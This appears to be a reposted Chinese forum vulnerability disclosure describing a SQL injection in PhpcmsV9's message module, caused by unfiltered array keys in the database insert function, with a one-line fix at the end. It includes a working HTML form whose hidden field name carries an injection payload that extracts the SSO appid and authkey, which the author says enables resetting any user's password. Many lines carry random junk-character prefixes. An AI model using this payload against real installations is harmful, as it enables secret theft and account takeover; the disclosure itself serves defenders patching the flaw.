PhpcmsV9 SQL注射修改任意用户密码漏洞

admin

简要描述：
* Q" o* ~" y, Q& f  [" q# z
6 `* F$ y8 i# q第二发如约来到，感谢大家的关注，在第二发中使用了一个无限制的SQL注射，最终目的可以修改任意用户密码，建议确认安全危害等级为高。
( e& q/ C- V0 b6 E; d, g& b; @
明天再更新下一个漏洞。
详细说明：
2 F2 ?! `  C& Q* V8 ^$ c5 O5 @在/phpcms9/phpcms/modules/message/index.php中有代码如下：
+ E/ n" D" l9 `9 \
2 y/ A5 v8 e7 W+ u& I$messageid = $this->message_db->insert($_POST['info'],true);


insert方法是key value的，代码如下：
  i! S: h4 G# t7 J3 m* {) @
( U* H( I! B! A/ j) Bpublic function insert($data, $table, $return_insert_id = false, $replace = false) {
  j4 R) i8 @1 l, Z/ S) `$ r                if(!is_array( $data ) || $table == '' || count($data) == 0) {
                        return false;
                }
% W  F  ]' h: e$ }- Q5 M, z               
3 Z! p: \( w9 Z4 C; O- {) T- V4 Y                $fielddata = array_keys($data);
                $valuedata = array_values($data);
                array_walk($fielddata, array($this, 'add_special_char'));
8 d" z5 V  Q% C+ R0 w                array_walk($valuedata, array($this, 'escape_string'));
               
, W) N+ ^, S: D  W. i                $field = implode (',', $fielddata);
( J4 e( m5 H9 L/ E/ u( b9 s6 y& M: o                $value = implode (',', $valuedata);

                $cmd = $replace ? 'REPLACE INTO' : 'INSERT INTO';
1 Q8 |- h! w1 x  a$ T% ]/ s                $sql = $cmd.' `'.$this->config['database'].'`.`'.$table.'`('.$field.') VALUES ('.$value.')';
                $return = $this->execute($sql);
% k  G9 b# m% Q: R" t6 X0 M                return $return_insert_id ? $this->insert_id() : $return;
4 o5 }) N6 }0 T3 ^        }

. g7 B+ M! N5 [! P0 q0 u7 w" u
嗯，很遗憾的是
: J$ z5 y# v9 r; V
array_walk($fielddata, array($this, 'add_special_char'));


6 B" V" V' ?) M, p中并没有对key做任何的过滤，所以，第一段提到的代码导致了一个SQL注射漏洞 ：（。
5 r5 K3 A1 W' M! X9 V5 u8 g) [
( s( _3 C/ v) i到此，为了poc一下，我读取了我本地的authkey，接下来我已经可以重置任意用户密码了，后面的事情我就没有演示了。

漏洞证明：
* n4 ?* f# Y4 \7 S; i8 V6 P( p读出了phpsso_server的appid和authkey，然后可以调用client.class.php中的ps_member_edit函数修改任意用户密码。


表单如下：用户名什么的得自己改一改。
<form name="myform" action="http://localhost/phpcms9/index.php?m=message&c=index&a=reply" method="post" id="myform">
" F/ {1 ^4 a/ ]8 i' `<table width="100%" cellspacing="0" class="table_form">
<tr>
, q% D, d. T9 ?/ }% Y% D2 f<th>标 题：</th>
<td><input name="info[subject]" type="text" id="subject" size="30" value="Re: hh"  class="input-text"/></td>
</tr>
& F- X9 C: k# Z9 U<tr>
<th>内 容：</th>
) V: B( G- W9 ^7 @7 m<td><textarea name="info[content]"  id="con" rows="5" cols="50"></textarea></td>
! j, i  e, g7 h</tr>
" u8 y2 F  ?# z3 B- a$ d/ |8 O<input type="hidden" name="info[replyid]" value="2" />
<input type="hidden" name="info[send_to_id]" value="cc" />
  w1 K5 Z% z5 L! V: }; \! l<input type="hidden" name="info[send_from_id]" value="hh">
! x% O& f" ?2 v4 I: Y$ S8 l( o<!-- 漏洞的利用重点在这里开始 -->
' _# o) l7 K- b; A5 @7 _<input type="hidden" name="info[`status`) values ((Select group_concat(appid,CHAR(42),authkey) from v9_sso_applications),1,1,1,CHAR(104, 104),1)#]" value="cc" />
3 m: d) N" y. U3 K$ E<!-- 漏洞的利用重点在这里结束 -->
<tr>
$ C) k9 s, H+ V# @3 L<th>验证码：</th>
<td><input name="code" type="text" id="code" size="10"  class="input-text"/> <img id='code_img' onclick='this.src=this.src+"&"+Math.random()' src='http://localhost/phpcms9/api.php?op=checkcode&code_len=4&font_size=14&width=110&height=30&font_color=&background='></td>
' o+ s2 @: g( B( z: K9 e3 V</tr>
<tr>
<td></td>
$ w. p: Z3 e# @5 `- }  R- s<td colspan="2"><label>
3 p# g! ?8 u; m& X) h5 n" i9 R5 X! L<input type="submit" name="dosubmit" id="dosubmit" value="确 定" class="button"/>
</label></td>
</tr>
" F6 l5 I& ?( I1 b</table>
</form>
) ]$ v4 I( U- ^6 P在add_special_char函数内对key做过滤就可以了。



1 n1 ?% N. j/ L/ |) l1 E